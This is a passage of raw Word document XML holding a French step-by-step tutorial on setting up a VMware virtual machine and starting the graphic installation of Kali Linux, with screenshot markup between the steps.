        <w:t>Sélectionnez "Installer disc image file (iso)", ensuite sélectionnez le fichier ISO de kali linux que vous avez téléchargé. Cliquez sur "Next".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2504D343" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="22313F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4529700E" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="22313F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1440CA43" wp14:editId="149C1E65">
            <wp:extent cx="3476625" cy="3492833"/>
            <wp:effectExtent l="0" t="0" r="0" b="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13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3481964" cy="3498197"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BCA432" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="22313F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CF40D93" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="007349C8" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="22313F"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007349C8">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="006090"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Etape 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B97A19" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="007349C8" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="22313F"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007349C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="22313F"/>
        </w:rPr>
        <w:t>Dans cette étape, sélectionnez le type de système d'exploitation à installer puis entrez le nom de la machine virtuelle. Dans mon cas, je vais le nommer "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007349C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="22313F"/>
        </w:rPr>
        <w:t>Funinformatique</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007349C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="22313F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kali Linux". Choisissez aussi la location, je vous recommande de créer un dossier nommé "Virtual machines" dans mes Documents. Ensuite cliquez sur Next.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8DE5AD" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="22313F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4446C90E" wp14:editId="6A9BF90C">
            <wp:extent cx="3581400" cy="3589768"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3595447" cy="3603847"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB0FA75" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="22313F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="198547D4" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="006090"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Etape 4:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Après il faut sélectionnez la taille maximum de l'espace de stockage que vous souhaitez utiliser pour kali linux. Je recommande d'utiliser 30 GB. Après changer l'option suivante à "Store Virtual </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>disk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as a single file" et cliquez sur Next.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29214405" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="7C3B2989" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="006090"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Etape 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B5760B" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t xml:space="preserve">Dans la fenêtre suivante, il faut configurer le matériel virtuel que nous allons utiliser dans Kali linux. Donc cliquez sur le bouton "the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Customize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Hardware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407E2E7B" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CAE2ED4" wp14:editId="41476351">
            <wp:extent cx="2984460" cy="2771775"/>
            <wp:effectExtent l="0" t="0" r="6985"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pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2987062" cy="2774191"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C9FE26" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="3727CD00" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Sélectionnez "Memory", et choisissez la taille de mémoire que vous souhaitez donner au système kali linux. Pour moi, comme je dispose 4 go dans mon ordinateur, je vais choisir 2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GB’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2048 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Mb’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cliquez ensuite sur Network Adapter. Dans cette partie, nous allons à dire à Vmware d'utiliser la carte wifi de notre ordinateur.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Pour cela, sélectionner l'option </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bridged</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> et cliquez sur le bouton "Configure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Adapters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>".</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dans la nouvelle fenêtre, désélectionner tout sauf votre carte réseau WIFI et cliquez sur OK. Vous pouvez maintenant cliquer sur Fermer au bas de la fenêtre du matériel et cliquez sur Terminer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF040A3" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77EC5333" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="22313F"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="006090"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Etape 6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4040CF40" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="007349C8" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007349C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Félicitation ! Le nouveau fichier de machine virtuelle est maintenant bien configuré et il est ajouté à la bibliothèque VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115BB0AE" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="22313F"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007349C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Maintenant tout ce que vous reste à faire est démarrer votre machine virtuelle! Pour cela, cliquez sur le nom de la machine virtuelle nouvellement créée, puis cliquez sur Play </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007349C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>virtual</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007349C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine</w:t>
      </w:r>
      <w:r w:rsidRPr="007349C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="22313F"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0595C24E" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="22313F"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D4BDB90" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="007349C8" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="22313F"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AB9EE45" wp14:editId="79F6B0B8">
            <wp:extent cx="4312211" cy="3599689"/>
            <wp:effectExtent l="0" t="0" r="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19467" cy="3605746"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42330A1D" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="3B17DC78" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="1D71AA95" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="002C0254" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="22313F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Le mode live</w:t>
      </w:r>
      <w:r w:rsidRPr="002C0254">
        <w:t> a la particularité de pouvoir lancer un système Linux sans installation sur le disque dur. </w:t>
      </w:r>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="22313F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>L'avantage</w:t>
      </w:r>
      <w:r w:rsidRPr="002C0254">
        <w:t> de mode live c'est qu'il vous permet de tester le système avant de l’installer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA9D871" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="002C0254" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="22313F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Son inconvénient</w:t>
      </w:r>
      <w:r w:rsidRPr="002C0254">
        <w:t>, c'est qu'il n’est généralement pas possible de sauvegarder directement les modifications effectuées en cours de session. C'est à dire une fois que vous arrêtez le système tous les documents crées et les logiciels que vous auriez installés seront perdu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE13761" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="002C0254" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r w:rsidRPr="002C0254">
        <w:t>Donc il est préférable de l'</w:t>
      </w:r>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="22313F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>installer sur votre machine virtuelle</w:t>
      </w:r>
      <w:r w:rsidRPr="002C0254">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D162CEC"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56C64BC6" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00FA5A6B" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="36" w:space="0" w:color="E0EB93"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="360"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="9FB600"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5A6B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="9FB600"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Comment installer kali linux sous VMWARE ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1055D674" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="22313F"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:ascii="inherit" w:eastAsiaTheme="majorEastAsia" w:hAnsi="inherit"/>
          <w:color w:val="006090"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Etape 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4810ECB8" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t xml:space="preserve">Dans le boot menu de kali Linux, choisissez l’option "Graphic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>install</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" et cliquez sur Entrer. Dans la fenêtre suivante, il vous sera demandé de choisir la langue du système.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C561ABF" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="1E4CEB4E" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="07EBC19E" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="7A6F794D" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07E67304" wp14:editId="2ED710C9">
            <wp:extent cx="5760720" cy="4681220"/>
            <wp:effectExtent l="0" t="0" r="0"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681220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="218D73F0" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="4AA5867E" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00FA5A6B" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="22313F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5A6B">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006090"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Etape 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B25747A" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00FA5A6B" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="22313F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5A6B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="22313F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ensuite choisissez votre situation géographique. Après il faut choisir la langue de votre clavier. Cliquer sur suivant, attendez quelques secondes, le temps que kali linux détecte le matériel de votre ordinateur. Ensuite vous auriez une fenêtre qui vous demande d'entrer le nom de votre machine. Entrez le nom qui vous convient le mieux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="22313F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F24AF4" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00FA5A6B" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="22313F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5A6B">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006090"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Etape 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48325C4A" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="22313F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5A6B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="22313F"/>
